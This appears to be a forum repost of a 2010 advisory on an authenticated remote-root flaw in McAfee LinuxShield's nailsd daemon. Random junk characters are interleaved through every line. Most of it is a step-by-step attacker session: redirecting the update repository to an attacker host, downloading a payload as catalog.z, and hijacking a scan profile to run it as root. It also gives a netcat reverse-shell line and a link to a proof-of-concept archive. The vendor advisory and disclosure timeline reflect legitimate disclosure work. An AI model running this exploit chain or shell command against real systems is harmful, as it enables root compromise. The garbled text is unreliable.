    9 T) H2 `  L" l- y
    ' z- ^* `+ E# a  \: [$ T: pLinuxShield uses a web-browser interface, and a large number of. n: d/ e  i$ Q& `: k- @3 `9 |9 W
    LinuxShield installations can be centrally controlled by ePolicy" v( O7 M7 B$ \
    Orchestrator.
    & R/ H: Y, h/ ^* W& I- n, Q6 D; r% _; u) Q  A
    (Product description from LinuxShield Product Guide)- Z' Q# |  p1 _

    9 p, f$ O" _7 n8 y# s* n9 ~+ ^9 I  p8 e  J$ X3 G' G6 O# I

    * E! C9 C% q: l' y1 [: t: i, GDescription:
    8 B4 g1 K( Y# }2 ^' z============# ^. h3 E! S9 @
    8 @8 ]% ?/ A3 L6 z6 a# V& x
    This vulnerability allows remote attackers to execute arbitrary code
    6 ?+ T; e" O* s3 S6 s% q1 _on vulnerable installations of McAfee LinuxShield. User interaction
    ( h" t! T  `3 Jis not required to exploit this vulnerability but an attacker must
    $ V5 F$ v5 U* {: _be authenticated.
    + n9 s$ |9 l1 ^  {, p+ W/ g
    + E  }: z! V! ?7 LThe LinuxShield Webinterface communicates with the localy installed
    ' I$ ^. s$ C4 z* o' R$ r# O0 q"nailsd" daemon, which listens on port 65443/tcp, to do9 ]. m& L& l' S. K* W9 N7 D
    configuration
    & [& ~" p; y! V' ochanges, query the configuration and execute tasks.2 R- Z! D( P  d; [& Y( A; D+ p5 p
    2 d$ P5 q) {: J0 D" v  v3 j. A
    Each user, which can login to the victim box, can also authenticate
    2 k) f5 e$ O( [it self to the "nailsd" and can do configuration changes and; j4 [. [0 i9 k4 y1 l9 A" S
    execute7 D# A4 n- G) P0 f
    tasks with root privileges.4 P( R3 g, |, m& A  P

    ' a! b! P( F3 k& t+ uA direct execution of commands is not possible, but it is possible to: q1 ^3 `& O6 R) g; ~$ o, j" ~3 ^' D
    download and execute code through manipulation of the config and
    3 I$ B! G0 B2 Y0 W& B4 S* u# T: [execute schedule tasks of the LinuxShield.
    ; r: t' ?% Z) Z6 ?+ j% t* w3 r: o5 A, G. [7 s
    " h7 h+ {5 X$ |2 y! c
    walk-through (after the TLS handshake):
    ) J+ Q( i: A  N7 U( b4 X: O3 Y+--------------------------------------
    / w' P+ l% M7 ?% R5 w/ N
    ) H/ U4 S7 s2 h' Knailsd > +OK welcome to the NAILS Statistics Service
    1 M+ j7 f- r$ [# B7 ^# _% cattacker> auth <user> <pass>
    ) ^' h. t) c2 e: u5 q, i3 H2 j4 inailsd > +OK successful authentication
    ( \- U, o( y2 V4 W) Y+ ~1 x/ L
    1 Q; K, v! ]5 i5 w3 ]9 y' w# Set the Attacker repository to download our code from a httpd
    - ?8 F4 n: Z! M# T$ F2 \# (catalog.z): W* w4 }! X" v) {
    #---------------------------------------------------------------/ w/ y% [) W+ z7 h6 N: [5 C- Y
    attacker> db set 1 _table=repository status=1 siteList=<?xml version
    9 C: d* K2 L9 E3 i8 O="1.0" encoding="UTF-8"?><ns:SiteLists
    . a9 f/ \( S  g" _( X/ U& N$ X. Sxmlns:ns="naSiteLi
    % F" s1 }1 z, b' ?st" GlobalVersion="20030131003110"
    : C: l9 r+ ]6 d4 M. d: TLocalVersion="20091209! W( l) F; F: W# e
    161903" Type="Client"><SiteList
    5 u: d; l$ \3 g0 h  ~' e2 d/ y* [2 vDefault="1" Name="SomeGU
    5 y- Z! g- f4 s) g* P$ l7 rID"><HttpSite Type="repository"$ {" f) R( e5 ]- n% e
    Name="EvilRepo" Order="1
    $ D! [5 ?# \# V) S! M* f) |" Server="<attackerhost>:80"1 d* x- p: j' F  ]' M
    Enabled="1" Local="1"><Rela) L6 a- p+ w& @5 d: A6 O

    & X1 q9 M: ~" |5 t8 T6 XtivePath>nai</RelativePath><UseAuth>0</UseAuth><Use3 x/ W, V$ R# X+ p, C# x
    rName></
    + c) V# ?6 u# q$ {5 B3 i+ [0 }UserName><Password" G" g  V! p- W5 d& G3 I- B, j
    Encrypted="0"/></HttpSite></SiteList></
    7 t# ]+ `- g9 {7 L) k" n# Y& i4 Hns:SiteLists> _cmd=update
    ! L* ]0 ^2 C2 tnailsd > +OK database changes buffered.
    0 N8 m! U1 S$ }$ v2 I5 J/ p/ r6 m
    0 o+ C7 z4 q# s, I  `# Execute task to set the attacker repository" _7 U2 t0 z& D
    #---------------------------------------------------------------
    5 _$ m" Y' ~& {1 x1 M# h1 Fattacker> task setsitelist& H, d9 v4 E. I. J9 b1 l" h/ Q
    nailsd > +OK setting sitelist from CMA.; `6 A' N/ ?' o  K+ D

    1 T2 Q. `: F4 ]1 _# Execute the default Update task to download the code
    7 D% r/ V  K+ J3 v( f+ d) }* I#---------------------------------------------------------------
    $ }# I# N; h- ?) b8 F0 d6 zattacker> task nstart LinuxShield Update
    4 K" k4 X8 E6 Inailsd > +OK task LinuxShield Update starting# V3 A. V: _6 n( p. V

    + [: ~( [2 ^' S+ C" g: c. d# Create a Scan profile, which executes our code. The profiles are3 F" K% {' H! E1 h9 ]/ m
    # not stored in the database.
      ^6 P- Y3 ~6 v0 ]# P* V# Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg' t0 T; f: F3 |0 J/ T) E
    #---------------------------------------------------------------( T  w( B" M  k* Y7 ^
    attacker> sconf ODS_99 begin0 M' m: ]4 }& m6 R
    nailsd > +OK 1260400888' \3 Y# T# m5 x% X$ L2 P" K7 s7 r

    & H7 i0 H& f5 x# e, o# Set the variable "nailsd.profile.ODS_99.scannerPath" to the" P( W* Z- m; t
    path
    3 R# ~: `) j4 O7 n5 p! ^# where our earlier downloaded catalog.z file is stored.7 Z4 Y+ \% O" I! d- F. L
    # (/opt/McAfee/cma/scratch/update/catalog.z)
    # K. d+ |! T: X9 }#---------------------------------------------------------------
    $ H$ r6 e  J3 @2 ?% I- Sattacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=' X% C) G$ G3 L7 D- h
    true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O* o; Q# e7 I, J# c1 I/ ]* Q
    DS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=/ F: }$ I/ H; E- o! K; Q
    10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng
    9 |, g0 w& G8 m% Eine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro, ~6 W  Y: M6 _% @0 [
    file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD5 M  }8 P6 b- w5 o! V5 f" b3 F
    ir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en: N5 B/ E9 g) N+ W3 C
    ginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd' }5 w/ u8 x- r* ^1 Q1 j2 B' L  f" K
    .profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu
    ) R& H$ q9 R% j5 z  [* dristicAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru* l! h/ V+ w1 C1 \# @* V- L  l* a6 D
    e nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99
    , n1 [3 ?" U9 L2 N.mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi
    & _- w5 A4 l4 k( Sle.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil
    9 O# e; x6 N# R# w: bdren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin
    3 Z% F( ]4 G- u0 U3 W  Te nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr
    / N- E1 Z( U& mofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm
    - q: q- S$ }% M7 Uo=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile
    % o# W* O, Y1 R4 r! F.ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t0 K* [" Z" {/ s2 g( [# s+ n- y, d0 g
    rue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat
    8 S- p7 d; C$ F1 Z1 Ech/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100
    " V. X! H1 J' @0 W00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.3 w3 Q7 c- ?# A) m+ ~- I, W. l% B" @
    ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil: C+ c2 l9 o; G7 K$ P# ]
    ter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true0 W: ~( u3 M  v7 z' h! M
    nailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr/ ?; }/ j# s9 ?
    ofile.ODS_99.filter.extensions.type=extension nailsd.profil7 }5 W2 f" {6 ^* m, {8 G
    e.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99/ |7 d$ L% K# F: ?# T
    .action.Default.secondary=Quarantine nailsd.profile.ODS_99.
    / p! Y* M4 }6 Z- H! @: }/ Qaction.App.primary=Clean nailsd.profile.ODS_99.action.App.s
    % g* Y" c. [3 o2 m5 I0 U; M! x. I5 {! lecondary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa' M. Q; q. B& S) z) E# y
    ss nailsd.profile.ODS_99.action.error=Block
    ' y* \/ W& u! j) ]+ {- g2 N) ^2 @nailsd > +OK configuration changes buffered
    4 D+ C: ?  @8 m! m, v/ X& [1 yattacker> sconf ODS_99 commit 1260400888
    - s7 j4 J# m4 U5 bnailsd > +OK configuration changes stored+ ^; l# t" o( r6 |

    % B6 O$ b9 n* G* v4 W& U# Set a scan task with the manipulated profile to execute the code
    / r& ]6 k1 V, J4 f/ @#---------------------------------------------------------------
    ! Y1 h9 ]( A( f" ^5 S' W% V5 dattacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy* C2 J, ^* Q& H. Q
    pe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t
    $ m6 p: T# z% d$ z+ b; o# y0 ^6 gmp;exclude:false timetable=type=unscheduled taskResults=0 i( d6 b# F9 \5 U5 |0 x; @) w
    _lastRun=1260318482 status=Stopped _cmd=insert, @4 P; F. j3 I8 d
    nailsd > +OK database changes buffered
    7 d( |' y4 R, T) S) _; a" H
    ' m* f" e, O$ g# }# Execute scan task to execute the code
    - f& V* Z" Q' m# ]5 h4 f8 b- V#---------------------------------------------------------------
    1 n% L9 R( b# rattacker> task nstart Evil Task" F, z* t3 U6 [  q3 `

    9 ^# T' V0 ]! A% B3 Z+-------------------------------------- walk-through EOF0 X- f! w. J1 _7 t4 ^
    # f& ^) h8 D# ^( y5 Y- Q! N

    - l* n" C; e/ ^( i" k9 iTo get a reverse root shell place something like this in the catalog.z
    3 t' y& S9 v% h8 `7 D8 j( }0 R
    $ X6 G8 E9 O2 i% Y$ k0 A8 l--- snip ---
    . I; g( l8 e8 ~) Z5 P/ I#!/bin/sh( R: `. |9 ]# C: T* n- j: n8 {/ F
    nc -nv <attacker_host> 4444 -e /bin/sh3 x% E2 T$ o" y* [, d
    --- /snip ---# q7 U/ Z/ U' `& l' a0 H) E) ^

    9 C# I1 S7 Y9 ~8 {! o" l
    ) k5 x9 x# |9 n$ t9 |" h6 ^
    ; X' }* }, k' S/ W* J" q+ bProof of Concept :, a, i3 ^$ E+ d# q5 F: k
    ==================$ d2 i7 X' d! R! _) y
    1 B, B4 A& J$ x, S- s% r, `
    http://inj3ct0r.com/sploits/11165.tar.gz
    ) ^- t  w# N9 ^8 U9 ]6 S" _$ {6 Y
    ( r% W7 o, R# ?3 c; l  U* h  G
    ) @0 T, i; x7 R' T; O. h7 k7 F) h( @# c7 }8 n1 `
    Solution:8 o! l" `. h6 S( q" f
    =========% h" g: B5 t- H  W. x- Z- E+ G( Y
    # V$ t3 X* {4 H: ~& [  X
    McAfee Advisory
    3 V3 K- J4 }& |6 f" v+--------------. E* y/ W) V2 a1 v0 p
    https://kc.mcafee.com/corporate/index?page=content&amp;id=SB10007
    + _( W! T) ~, B  z3 Q
    5 |" f- ?2 l- N8 t5 K( J$ r$ L9 h4 G7 ~( B
    / @& H4 c" s; ^. v7 B' J9 [% G: o
    Disclosure Timeline (YYYY/MM/DD):" x* H- h/ b% y3 B: B8 }
    =================================* @1 ^9 a' G& i# U6 u' y$ K
    ; U  P: e: f' h. D
    2009.12.07: Vulnerability found* Z% s& P3 I5 ]5 V3 Y0 i1 H. g
    2010.02.03: Asked vendor for a PGP key9 `. A' B6 H- F$ n* e
    2010.02.05: Vendor sent his PGP key7 y, E0 i- t% D; l* G) `
    2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure
    6 L6 l4 l7 N" M2 Tdate (2010.02.18) to Vendor
    # S* [" q9 N$ \( f. B2010.02.05: Vendor acknowledges the reception of the advisory! R& F( N9 C; X( l8 N; `& j6 `
    2010.02.16: Ask for a status update, because the planned release date is
    / t1 W2 z7 c+ d4 q& g8 S9 h4 t2010.02.18.
    ' f: c/ V$ [# D) H6 ?# P9 ]. A2010.02.16: Vendor response that, they are currently working on a patch2 j: m7 y% O: R2 D
    2010.02.17: Changed release date to 2010.02.25.
    & z/ o9 b0 @# x4 U3 Q7 b! ^2010.02.22: Vendor gives a status update, that they are able to release
    3 q- \6 A9 r2 j$ q7 Uthe patch on 2010.02.25.
    $ d9 M6 v/ j& _5 D. A" c2010.02.24: Ask for a list of affected products and the advisory url.! t! S/ m9 a: i/ ~& R" m, H  m# G
    2010.02.24: Vendor sends the list.
    ) z# B8 ^8 ~2 G! U. i  Q9 }2010.03.02: Release of this Advisory
    9 q! S; ]6 Y. A9 d, }- r0 f
    4 G1 L, n$ `; i$ U, C0 u! Q  o9 X: D' l: r. N# W
    3 ~: Q4 d! y/ }; v0 ?

    + T" j$ {: F2 X6 J0 B: b. i8 C, x" I' b

    " u& h# R$ `$ m9 j9 @. B* Z6 ~% n# Q9 ~- I( ~4 }
    5 t6 e% `, V, Z* J
    8 Z4 G1 y9 F. e
    $ b- A2 g8 ]: ^) f; g8 K" d8 |
    6 L- U# I4 A2 x2 w( x
    ! P. W3 N7 `0 r* F- N; z
    / }1 R$ @2 u' y" L

    " e+ p4 W$ b2 A: G" d  {4 S) p% k- _* B+ r' K
    3 {% U0 G6 `; R) l5 B! g) R- d7 ]

    ; `/ c- y# g/ N" v4 l* D2 c6 N% d$ {( v4 r5 \9 G9 u( R2 u/ s

    : H/ z5 P! |; ]0 X, R! C
    + v$ q* b8 ]1 r* {) ?6 k* R7 n5 q8 t) S3 t5 b4 R
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    返回列表